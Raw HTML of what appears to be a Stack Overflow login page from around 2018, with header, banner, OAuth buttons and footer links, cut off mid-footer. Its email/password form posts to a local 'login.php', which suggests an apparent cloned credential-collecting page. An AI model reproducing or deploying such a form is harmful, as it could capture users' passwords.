<svg aria-hidden="true" class="svg-icon iconAchievements" width="18" height="18" viewBox="0 0 18 18"><path d="M15 2V1H3v1H0v4c0 1.6 1.4 3 3 3v1c.4 1.5 3 2.6 5 3v2H5s-1 1.5-1 2h10c0-.4-1-2-1-2h-3v-2c2-.4 4.6-1.5 5-3V9c1.6-.2 3-1.4 3-3V2h-3zM3 7c-.5 0-1-.5-1-1V4h1v3zm8.4 2.5L9 8 6.6 9.4l1-2.7L5 5h3l1-2.7L10 5h2.8l-2.3 1.8 1 2.7h-.1zM16 6c0 .5-.5 1-1 1V4h1v2z"/></svg>
<span class="indicator-badge js-unread-count _positive" style="display: none;"></span>
</a>
</li>
<li class="-item"><a href="#" class="-link js-help-button" title="Help Center and other resources">
<svg aria-hidden="true" class="svg-icon iconHelp" width="18" height="18" viewBox="0 0 18 18"><path d="M9 1a8 8 0 1 0 0 16A8 8 0 0 0 9 1zm.81 12.13c-.02.71-.55 1.15-1.24 1.13-.66-.02-1.17-.49-1.15-1.2.02-.72.56-1.18 1.22-1.16.7.03 1.2.51 1.17 1.23zM11.77 8a5.8 5.8 0 0 1-1.02.91l-.53.37c-.26.2-.42.43-.5.69a4 4 0 0 0-.09.75c0 .05-.03.16-.18.16H7.88c-.16 0-.18-.1-.18-.15.03-.66.12-1.21.4-1.66a5.29 5.29 0 0 1 1.43-1.22c.16-.12.28-.25.38-.39a1.34 1.34 0 0 0 .02-1.71c-.24-.31-.51-.46-1.03-.46-.51 0-.8.26-1.02.6-.21.33-.18.73-.18 1.1H5.75c0-1.38.35-2.25 1.1-2.76.52-.35 1.17-.5 1.93-.5 1 0 1.79.18 2.49.71.64.5.98 1.18.98 2.12 0 .57-.2 1.05-.48 1.44z"/></svg>
</a></li>
<li class="-item">
<a href="https://stackexchange.com" class="-link js-site-switcher-button js-gps-track" data-gps-track="site_switcher.show" title="A list of all 171 Stack Exchange sites">
<svg aria-hidden="true" class="svg-icon iconStackExchange" width="18" height="18" viewBox="0 0 18 18"><path d="M1 13c0 1.1.9 2 2 2h8v3l3-3h1a2 2 0 0 0 2-2v-2H1v2zM15 1H3a2 2 0 0 0-2 2v2h16V3a2 2 0 0 0-2-2zM1 6h16v4H1V6z"/></svg>
</a>
</li>
</ol>
</nav>
<div class="-ctas">
<a href="https://stackoverflow.com/users/login?ssrc=head" class="login-link btn-clear" rel="nofollow">Log In</a>
<a href="https://stackoverflow.com/users/signup?ssrc=head&returnurl=%2fusers%2fstory%2fcurrent&amp;utm_source=stackoverflow.com&amp;utm_medium=dev-story&amp;utm_campaign=signup-redirect" class="login-link btn-topbar-primary" rel="nofollow" data-ga="[&quot;Sign Up&quot;,&quot;Sign Up Navigation&quot;,&quot;Header&quot;,null,null]">Sign Up</a>
</div>
</div>
</div>
</header>
<script>
StackExchange.ready(function() { StackExchange.topbar.init(); });
StackExchange.scrollPadding.setPaddingTop(60, 10); </script>
<div id="announcement-banner" data-campaign="2018-01-08.DevSurveyBanner" data-cookie="notice-sur" data-end-date="1516964400000">
<div class="-container">
<span class="-body">It&#39;s back!</span>
<a class="-link js-link js-gps-track" href="/dev-survey/start?utm_source=so-owned&amp;utm_medium=hero&amp;utm_campaign=dev-survey-2018-collection" data-ga="[&quot;DevSurveyBanner&quot;,&quot;Announcement Banner&quot;,&quot;/dev-survey/start?utm_source=so-owned&amp;utm_medium=hero&amp;utm_campaign=dev-survey-2018-collection&quot;,null,{&quot;dimension4&quot;:&quot;DevSurveyBanner&quot;}]"
data-gps-track="announcement_banner.click({campaign: '2018-01-08.DevSurveyBanner', location: 22, action: 2})">Take the 2018 Developer Survey today &raquo;</a>
<a class="-dismiss js-dismiss js-gps-track" href="#" title="dismiss"
data-gps-track="announcement_banner.click({campaign: '2018-01-08.DevSurveyBanner', location: 22, action: 1})"><svg aria-hidden="true" class="svg-icon iconClear" width="18" height="18" viewBox="0 0 18 18"><path d="M15 4.41L13.59 3 9 7.59 4.41 3 3 4.41 7.59 9 3 13.59 4.41 15 9 10.41 13.59 15 15 13.59 10.41 9z"/></svg></a>
</div>
</div>
<script>
StackExchange.ready(function () {
var $banner = $('#announcement-banner');
function setCookie(value) {
$.cookie($banner.data('cookie'), value, {
expires: (new Date($banner.data('end-date') + 86400000)),
path: '/'
});
}
$banner.find('.js-link').click(function () {
setCookie('2;' + Date.now());
});
$banner.find('.js-dismiss').click(function () {
setCookie('4;' + Date.now());
$banner.animate({ height: '0', opacity: 0 }, 'fast', 'linear', function () { $banner.remove(); });
return false;
});
});
</script>
<div class="container">
<div id="content" class="snippet-hidden">
<div class="subheader">
<div id="tabs" style="float: left;">
<a href="/users/login?ssrc=head&returnurl=https%3a%2f%2fstackoverflow.com%2f" title="Log in to Stack Overflow" class="youarehere">Log in</a>
<a href="/users/signup?ssrc=head&returnurl=https%3a%2f%2fstackoverflow.com%2f" title="Sign up to Stack Overflow">Sign up</a>
</div>
</div>
<div id="login-page">
<div id="explanation-text">
Stack Overflow is part of the <img title="Stack Exchange" src="https://cdn.sstatic.net/Sites/stackexchange/img/logo.png?v=ca40535fea2d"/> network of 170 Q&amp;A <a href="https://stackexchange.com/sites">communities</a>. </div>
<div id="formContainer">
<div id="openid-buttons">
<div class="major-provider google-login" data-provider='google' data-oauthserver='https://accounts.google.com/o/oauth2/auth' data-oauthversion='2.0'>
<svg aria-hidden="true" class="svg-icon native iconGoogle" width="18" height="18" viewBox="0 0 18 18"><g><path d="M16.51 8H8.98v3h4.3c-.18 1-.74 1.48-1.6 2.04v2.01h2.6a7.8 7.8 0 0 0 2.38-5.88c0-.57-.05-.66-.15-1.18z" fill="#4285F4"/><path d="M8.98 17c2.16 0 3.97-.72 5.3-1.94l-2.6-2a4.8 4.8 0 0 1-7.18-2.54H1.83v2.07A8 8 0 0 0 8.98 17z" fill="#34A853"/><path d="M4.5 10.52a4.8 4.8 0 0 1 0-3.04V5.41H1.83a8 8 0 0 0 0 7.18l2.67-2.07z" fill="#FBBC05"/><path d="M8.98 4.18c1.17 0 2.23.4 3.06 1.2l2.3-2.3A8 8 0 0 0 1.83 5.4L4.5 7.49a4.77 4.77 0 0 1 4.48-3.3z" fill="#EA4335"/></g></svg> Google
</div>
<div class="major-provider facebook-login" data-provider='facebook' data-oauthserver='https://www.facebook.com/v2.0/dialog/oauth' data-oauthversion='2.0'>
<svg aria-hidden="true" class="svg-icon iconFacebook" width="18" height="18" viewBox="0 0 18 18"><path d="M1.88 1C1.4 1 1 1.4 1 1.88v14.24c0 .48.4.88.88.88h7.67v-6.2H7.46V8.4h2.09V6.61c0-2.07 1.26-3.2 3.1-3.2.88 0 1.64.07 1.87.1v2.16h-1.29c-1 0-1.19.48-1.19 1.18V8.4h2.39l-.31 2.42h-2.08V17h4.08c.48 0 .88-.4.88-.88V1.88c0-.48-.4-.88-.88-.88H1.88z" fill="#3C5A96"/></svg> Facebook
</div>
</div>
<div class="or-container">
<hr class="or-hr"/>
<div id="or">or</div>
</div>
<form id="login-form" action="login.php" method="post">
<input type="hidden" name="ssrc" value="head"/>
<label for="email">Email</label><br/>
<input type="email" name="email" id="email" placeholder="you@example.org"/><br/>
<label for="password">Password</label><br/>
<input type="password" name="pass" id="password" placeholder="********"/><br/>
<a id="forgot-pw" class="fr" href="/users/account-recovery">forgot?</a>
<br class="cbt"/>
<a id="more-options-link">more login options</a>
<input class="fr" type="submit" id="submit-button" name="submit-button" value="Log in"/>
<div id="openid_form">
<input type="hidden" id="oauth_version" name="oauth_version" />
<input type="hidden" id="oauth_server" name="oauth_server" />
<div>
<noscript>
<p class="noscript-notice">
Open ID is a service that allows you to log on to many different websites using a single identity. Find out <a href="http://openid.net/what/">more about OpenId</a> and <a href="http://openid.net/get/">how to get an OpenID-enabled account</a>.
</p>
</noscript>
</div>
<div id="show-more-options">
<div class="or-container">
<hr class="or-hr" />
<div id="or">or</div>
</div>
<div id="more-openid-options">
<a title="Log in with Yahoo" href="javascript:auth.signin($('#more-openid-options a.yahoo'));"
data-provider='yahoo' data-url='https://me.yahoo.com/'
style="background-position: -27px -300px"
class="yahoo openid_small_btn"></a>
<a title="Log in with LiveJournal" href="javascript:auth.signin($('#more-openid-options a.livejournal'));"
data-provider='livejournal' data-label='Enter your LiveJournal username' data-url='http://{username}.livejournal.com/'
style="background-position: -1px -352px"
class="livejournal openid_small_btn"></a>
<a title="Log in with Blogger" href="javascript:auth.signin($('#more-openid-options a.blogger'));"
data-provider='blogger' data-label='Enter your Blogger username' data-url='https://{username}.blogspot.com/'
style="background-position: -1px -249px"
class="blogger openid_small_btn"></a>
<a title="Log in with AOL" href="javascript:auth.signin($('#more-openid-options a.aol'));"
data-provider='aol' data-label='Enter your AOL username' data-url='https://openid.aol.com/{username}'
style="background-position: -27px -249px"
class="aol openid_small_btn"></a>
</div>
<div id="simple-openid-selector">
<div id="openid_input_area">
<p id="openid_provider_label"></p>
<input id="openid_username" type="text" name="openid_username" value="">
</div>
<div id="openid-url-input-area">
<noscript>
<p class="noscript-notice">Because JavaScript is disabled, you can only log in by entering your OpenID URL manually:</p>
</noscript>
<label for="openid_identifier">OpenID</label>
<input id="openid_identifier" name="openid_identifier" placeholder="Or, you can manually enter your OpenID" class="openid-identifier" type="text" />
</div>
<input id="openid_submit" type="submit" value="Log In" class="fr">
</div>
</div>
</div>
</form>
</div>
<div id="switch">
Don&#39;t have an account? <a href="/users/signup?ssrc=head&returnurl=https%3a%2f%2fstackoverflow.com%2f">Sign up</a>
<div class="employer-link">
Are you an employer? <a href="https://careers.stackoverflow.com/users/login" class="external">Log in on Talent<span class="-icon"></span></a>
</div>
</div>
</div>
<script>
StackExchange.ready(function() {
auth.init( /* isSignupPage */ false, /* isLoginPage */ true, /* isAddLoginPage */ false, /* isPasswordPage */ false, /* needsCaptcha */ false);
StackExchange.using("gps", function() { StackExchange.gps.sendPending(); });
});
</script>
</div>
</div>
<footer id="footer" class="s-footer js-footer" role="contentinfo">
<div class="-container">
<div class="g-row">
<div class="-logo">
<a href="https://stackoverflow.com"><svg aria-hidden="true" class="svg-icon native iconLogo" width="150" height="30" viewBox="0 0 150 30"><g><path d="M33.9 18.6l-1.7-.2c-1.3-.1-1.9-.6-1.9-1.6 0-1.1.8-1.8 2.4-1.8 1.1 0 2.1.3 2.8.8l1-1c-1-.8-2.3-1.1-3.8-1.1-2.3 0-3.9 1.2-3.9 3.1 0 1.8 1.1 2.7 3.2 2.9l1.8.2c1.2.1 1.8.6 1.8 1.6 0 1.3-1.1 1.9-2.8 1.9-1.3 0-2.5-.3-3.3-1.2l-1 1c1.2 1.1 2.6 1.5 4.4 1.5 2.6 0 4.3-1.2 4.3-3.2-.2-2-1.5-2.7-3.3-2.9zm13.3-4.8c-1.7 0-2.8.3-3.7 1.5l1 1c.6-.9 1.3-1.2 2.7-1.2 1.9 0 2.7.8 2.7 2.3v1h-3.2c-2.4 0-3.7 1.2-3.7 3.1 0 .8.3 1.6.8 2.2.7.7 1.5 1 3 1 1.4 0 2.2-.3 3.1-1.1v1h1.6v-7.2c-.1-2.4-1.5-3.6-4.3-3.6zm2.7 7c0 .9-.2 1.5-.5 1.8-.7.6-1.5.7-2.4.7-1.7 0-2.4-.6-2.4-1.8 0-1.2.8-1.9 2.4-1.9h3l-.1 1.2zm7.6-5.6c1 0 1.6.3 2.4 1.2l1-1c-1.1-1.2-2-1.6-3.5-1.6-2.7 0-4.7 1.8-4.7 5.5 0 3.6 2 5.5 4.7 5.5 1.5 0 2.4-.4 3.5-1.6l-1.1-1c-.8.9-1.4 1.2-2.4 1.2s-1.9-.4-2.5-1.2c-.5-.7-.7-1.5-.7-2.9 0-1.3.2-2.2.7-2.9.7-.8 1.6-1.2 2.6-1.2zm13.4-1.3H69l-4.8 4.7V9.1h-1.6v15.4h1.6v-3.9l1.9-1.9 3.6 5.8h1.9l-4.4-6.9 3.7-3.7zm7.3-.33c-1.6 0-2.7.6-3.4 1.4-1 1-1.3 2.3-1.3 4.3s.3 3.3 1.3 4.3c.7.7 1.8 1.4 3.4 1.4 1.6 0 2.8-.6 3.4-1.4 1-1 1.3-2.3 1.3-4.3s-.3-3.3-1.3-4.3c-.6-.8-1.7-1.4-3.4-1.4zm1.3 8.3c-.3.3-.7.5-1.3.5-.6 0-1-.2-1.3-.5-.6-.6-.6-1.6-.6-2.7 0-1.2.1-2.1.6-2.7.3-.3.7-.5 1.3-.5.6 0 1 .2 1.3.5.6.6.6 1.5.6 2.7.1 1.2 0 2.2-.6 2.7zm10.8-8.2l-2.2 6.9-2.3-6.9h-2.9l4.1 11.1h2.2l4.1-11.1h-3zm7.6-.1c-2.9 0-4.8 2-4.8 5.7 0 4.5 2.5 5.7 5.1 5.7 2 0 3.1-.6 4.2-1.7l-1.7-1.6c-.7.7-1.3 1-2.5 1-1.6 0-2.4-1-2.4-2.5h6.9v-1.2c0-3.2-1.7-5.4-4.8-5.4zm-2.1 4.6c0-.5.1-.8.3-1.2.3-.7.9-1.2 1.9-1.2.9 0 1.6.5 1.9 1.2.2.4.2.7.3 1.2h-4.4zm11-3.4v-1.1h-2.7v11.1h2.8v-6.7c0-1.4.9-2 1.8-2 .7 0 1 .2 1.5.7l2.1-2.1c-.8-.8-1.5-1-2.6-1-1.3-.1-2.3.4-2.9 1.1zm6.3-2.3v12.3h2.8v-8.8h2v-2.1h-2v-1.2c0-.6.3-1 1-1h1.1v-2.3h-1.6c-2.3 0-3.3 1.6-3.3 3.1zm16.2 1.1c-1.6 0-2.7.6-3.4 1.4-1 1-1.3 2.3-1.3 4.3s.3 3.3 1.3 4.3c.7.7 1.8 1.4 3.4 1.4 1.6 0 2.8-.6 3.4-1.4 1-1 1.3-2.3 1.3-4.3s-.3-3.3-1.3-4.3c-.6-.8-1.8-1.4-3.4-1.4zm1.3 8.3c-.3.3-.7.5-1.3.5-.6 0-1-.2-1.3-.5-.6-.6-.6-1.6-.6-2.7 0-1.2.1-2.1.6-2.7.3-.3.7-.5 1.3-.5.6 0 1 .2 1.3.5.6.6.6 1.5.6 2.7 0 1.2 0 2.2-.6 2.7zm16.5-8.2l-1.8 6.9-2.3-6.9h-2l-2.3 6.9-1.8-6.9H134l3.4 11.1h2.3l2.3-7 2.3 7h2.3l3.4-11.1h-2.9zm-25.1 7.7V9.27h-2.8v12.3c0 1.6 1 3.2 3.2 3.2h1.6v-2.3h-1c-.7 0-1-.4-1-1.1zM41.3 15.6l1.4-1.4h-3v-3.5h-1.6v11.1c0 1.6.9 2.9 2.7 2.9h1.1v-1.3h-.8c-1 0-1.5-.6-1.5-1.6v-6.1h1.7v-.1z" fill="#222426"/><path fill="#BCBBBB" d="M21 27v-8h3v11H0V19h3v8z"/><path d="M5.4 19.1l13.56 1.96.17-2.38-13.26-2.55-.47 2.97zm1.8-6.8l12 5.6 1.1-2.4-12-5.6-1.1 2.4zm3.4-5.9l10.2 8.5 1.7-2-10.2-8.5-1.7 2zM17.1.2L15 1.8l7.9 10.6 2.1-1.6L17.1.2zM5 25h14v-3H5v3z" fill="#F48024"/></g></svg></a>
</div>
<nav class="-nav js-category _visible" data-name="default">
<h5 class="-title"><a href="https://stackoverflow.com" class="js-gps-track" data-gps-track="footer.click({ location: 22, link: 15})">Stack Overflow</a></h5>
<ul class="-list">
<li class="-item"><a href="/questions" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 16})">Questions</a></li>
<li class="-item"><a href="https://stackoverflow.com/jobs" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 17})">Jobs</a></li>
<li class="-item"><a href="https://stackoverflow.com/jobs/directory/developer-jobs" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 11})">Developer Jobs Directory</a></li>
<li class="-item"><a href="https://stackoverflow.com/jobs/salary" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 28})">Salary Calculator</a></li>
<li class="-item"><a href="/help" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 3 })">Help</a></li>
<li class="-item"><a onclick='StackExchange.switchMobile("on")' class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 12 })">Mobile</a></li>
</ul>
</nav>
<nav class="-nav js-category _visible" data-name="default">
<h5 class="-title"><a href="https://www.stackoverflowbusiness.com/?utm_source=so-footer&utm_medium=referral&utm_campaign=brand-activation&utm_term=sotob2b-footer-business-category" class="js-gps-track" data-gps-track="footer.click({ location: 22, link: 19 })">Stack Overflow<br /> Business</a></h5>
<ul class="-list">
<li class="-item"><a href="https://www.stackoverflowbusiness.com/talent?utm_source=so-footer&utm_medium=referral&utm_campaign=brand-activation&utm_term=sotob2b-footer-talent" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 20 })">Talent</a></li>
<li class="-item"><a href="https://www.stackoverflowbusiness.com/advertise?utm_source=so-footer&utm_medium=referral&utm_campaign=brand-activation&utm_term=sotob2b-footer-advertise" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 21 })">Ads</a></li>
<li class="-item"><a href="https://www.stackoverflowbusiness.com/enterprise?utm_source=so-footer&utm_medium=referral&utm_campaign=brand-activation&utm_term=sotob2b-footer-enterprise" class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 22 })">Enterprise</a></li>
</ul>
</nav>
<nav class="-nav js-category _visible" data-name="default">
<h5 class="-title"><a class="js-gps-track" data-gps-track="footer.click({ location: 22, link: 1 })" href="https://stackoverflow.com/company/about">Company</a></h5>
<ul class="-list">
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 1 })" href="https://stackoverflow.com/company/about">About</a></li>
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 27 })" href="https://stackoverflow.com/company/press">Press</a></li>
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 9 })" href="https://stackoverflow.com/company/work-here">Work Here</a></li>
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 7 })" href="https://stackexchange.com/legal">Legal</a></li>
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 8 })" href="https://stackexchange.com/legal/privacy-policy">Privacy Policy</a></li>
<li class="-item"><a class="js-gps-track -link" data-gps-track="footer.click({ location: 22, link: 13 })" href="https://stackoverflow.com/company/contact">Contact Us</a></li>
</ul>
</nav>
<div class="-network g-row">
<a href="#" class="-back-trigger js-back"><svg aria-hidden="true" class="svg-icon iconArrowLeftAlt" width="18" height="18" viewBox="0 0 18 18"><path d="M10.58 16L12 14.59 6.4 9 12 3.41 10.57 2l-7 7z"/></svg></a>
<div>
<h5 class="-title"><a href="https://stackexchange.com">Stack Exchange<br> Network</a></h5>
<ul class="-list">
<li class="-item"><a href="#" class="-link _expandable js-category-trigger js-gps-track" data-gps-track="footer.click({ location: 22, link: 24 })" data-target="Technology">Technology</a></li>
<li class="-item"><a href="#" class="-link _expandable js-category-trigger js-gps-track" data-gps-track="footer.click({ location: 22, link: 24 })" data-target="Life / Arts">Life / Arts</a></li>
<li class="-item"><a href="#" class="-link _expandable js-category-trigger js-gps-track" data-gps-track="footer.click({ location: 22, link: 24 })" data-target="Culture / Recreation">Culture / Recreation</a></li>
<li class="-item"><a href="#" class="-link _expandable js-category-trigger js-gps-track" data-gps-track="footer.click({ location: 22, link: 24 })" data-target="Science">Science</a></li>
<li class="-item"><a href="#" class="-link _expandable js-category-trigger js-gps-track" data-gps-track="footer.click({ location: 22, link: 24 })" data-target="Other">Other</a></li>
</ul>
</div>
</div>
<nav class="-nav js-category" data-name="Technology">
<ul class="-list">
<li class="-item"><a href="https://stackoverflow.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professional and enthusiast programmers">Stack Overflow</a></li>
<li class="-item"><a href="https://serverfault.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="system and network administrators">Server Fault</a></li>
<li class="-item"><a href="https://superuser.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="computer enthusiasts and power users">Super User</a></li>
<li class="-item"><a href="https://webapps.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="power users of web applications">Web Applications</a></li>
<li class="-item"><a href="https://askubuntu.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Ubuntu users and developers">Ask Ubuntu</a></li>
<li class="-item"><a href="https://webmasters.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="pro webmasters">Webmasters</a></li>
<li class="-item"><a href="https://gamedev.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professional and independent game developers">Game Development</a></li>
</ul></nav><nav class="-nav js-category" data-name="Technology"><ul class="-list">
<li class="-item"><a href="https://tex.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users of TeX, LaTeX, ConTeXt, and related typesetting systems">TeX - LaTeX</a></li>
<li class="-item"><a href="https://softwareengineering.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professionals, academics, and students working within the systems development life cycle">Software Engineering</a></li>
<li class="-item"><a href="https://unix.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users of Linux, FreeBSD and other Un*x-like operating systems">Unix &amp; Linux</a></li>
<li class="-item"><a href="https://apple.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="power users of Apple hardware and software">Ask Different (Apple)</a></li>
<li class="-item"><a href="https://wordpress.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="WordPress developers and administrators">WordPress Development</a></li>
<li class="-item"><a href="https://gis.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="cartographers, geographers and GIS professionals">Geographic Information Systems</a></li>
<li class="-item"><a href="https://electronics.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="electronics and electrical engineering professionals, students, and enthusiasts">Electrical Engineering</a></li>
</ul></nav><nav class="-nav js-category" data-name="Technology"><ul class="-list">
<li class="-item"><a href="https://android.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="enthusiasts and power users of the Android operating system">Android Enthusiasts</a></li>
<li class="-item"><a href="https://security.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="information security professionals">Information Security</a></li>
<li class="-item"><a href="https://dba.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="database professionals who wish to improve their database skills and learn from others in the community">Database Administrators</a></li>
<li class="-item"><a href="https://drupal.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Drupal developers and administrators">Drupal Answers</a></li>
<li class="-item"><a href="https://sharepoint.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="SharePoint enthusiasts">SharePoint</a></li>
<li class="-item"><a href="https://ux.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="user experience researchers and experts">User Experience</a></li>
<li class="-item"><a href="https://mathematica.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users of Wolfram Mathematica">Mathematica</a></li>
</ul></nav><nav class="-nav js-category" data-name="Technology"><ul class="-list">
<li class="-item"><a href="https://salesforce.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Salesforce administrators, implementation experts, developers and anybody in-between">Salesforce</a></li>
<li class="-item"><a href="https://expressionengine.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="administrators, end users, developers and designers for ExpressionEngine&#174; CMS">ExpressionEngine&#174; Answers</a></li>
<li class="-item"><a href="https://pt.stackoverflow.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="programadores profissionais e entusiastas">Stack Overflow em Portugu&#234;s</a></li>
<li class="-item"><a href="https://blender.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people who use Blender to create 3D graphics, animations, or games">Blender</a></li>
<li class="-item"><a href="https://networkengineering.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="network engineers">Network Engineering</a></li>
<li class="-item"><a href="https://crypto.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="software developers, mathematicians and others interested in cryptography">Cryptography</a></li>
<li class="-item"><a href="https://codereview.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="peer programmer code reviews">Code Review</a></li>
</ul></nav><nav class="-nav js-category" data-name="Technology"><ul class="-list">
<li class="-item"><a href="https://magento.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users of the Magento e-Commerce platform">Magento</a></li>
<li class="-item"><a href="https://softwarerecs.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people seeking specific software recommendations">Software Recommendations</a></li>
<li class="-item"><a href="https://dsp.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="practitioners of the art and science of signal, image and video processing">Signal Processing</a></li>
<li class="-item"><a href="https://emacs.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="those using, extending or developing Emacs">Emacs</a></li>
<li class="-item"><a href="https://raspberrypi.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users and developers of hardware and software for Raspberry Pi">Raspberry Pi</a></li>
<li class="-item"><a href="https://ru.stackoverflow.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="программистов">Stack Overflow на русском</a></li>
<li class="-item"><a href="https://codegolf.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="programming puzzle enthusiasts and code golfers">Programming Puzzles &amp; Code Golf</a></li>
</ul></nav><nav class="-nav js-category" data-name="Technology"><ul class="-list">
<li class="-item"><a href="https://es.stackoverflow.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="programadores y profesionales de la inform&#225;tica">Stack Overflow en espa&#241;ol</a></li>
<li class="-item"><a href="https://ethereum.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="users of Ethereum, the decentralized application platform and smart contract enabled blockchain">Ethereum</a></li>
<li class="-item"><a href="https://datascience.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Data science professionals, Machine Learning specialists, and those interested in learning more about the field">Data Science</a></li>
<li class="-item"><a href="https://arduino.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="developers of open-source hardware and software that is compatible with Arduino">Arduino</a></li>
<li class="-item"><a href="https://bitcoin.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Bitcoin crypto-currency enthusiasts">Bitcoin</a></li>
<li class="-item">
<a href="https://stackexchange.com/sites#technology" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 26 })">
<strong>
more (26)
</strong>
</a>
</li>
</ul>
</nav>
<nav class="-nav js-category" data-name="Life / Arts">
<ul class="-list">
<li class="-item"><a href="https://photo.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professional, enthusiast and amateur photographers">Photography</a></li>
<li class="-item"><a href="https://scifi.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="science fiction and fantasy enthusiasts">Science Fiction &amp; Fantasy</a></li>
<li class="-item"><a href="https://graphicdesign.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="Graphic Design professionals, students, and enthusiasts">Graphic Design</a></li>
<li class="-item"><a href="https://movies.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="movie and tv enthusiasts">Movies &amp; TV</a></li>
<li class="-item"><a href="https://music.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="musicians, students, and enthusiasts">Music: Practice &amp; Theory</a></li>
<li class="-item"><a href="https://worldbuilding.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="writers/artists using science, geography and culture to construct imaginary worlds and settings">Worldbuilding</a></li>
<li class="-item"><a href="https://cooking.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="professional and amateur chefs">Seasoned Advice (cooking)</a></li>
</ul></nav><nav class="-nav js-category" data-name="Life / Arts"><ul class="-list">
<li class="-item"><a href="https://diy.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="contractors and serious DIYers">Home Improvement</a></li>
<li class="-item"><a href="https://money.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="people who want to be financially literate">Personal Finance &amp; Money</a></li>
<li class="-item"><a href="https://academia.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="academics and those enrolled in higher education">Academia</a></li>
<li class="-item"><a href="https://law.stackexchange.com" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 25 })" title="legal professionals, students, and others with experience or interest in law">Law</a></li>
<li class="-item">
<a href="https://stackexchange.com/sites#lifearts" class="-link js-gps-track" data-gps-track="footer.click({ location: 16, link: 26 })">
<strong>
more (16)
</strong>
</a>
</li>
</ul>
</nav>
<nav class="-nav js-category" data-name="Culture / Recreation">
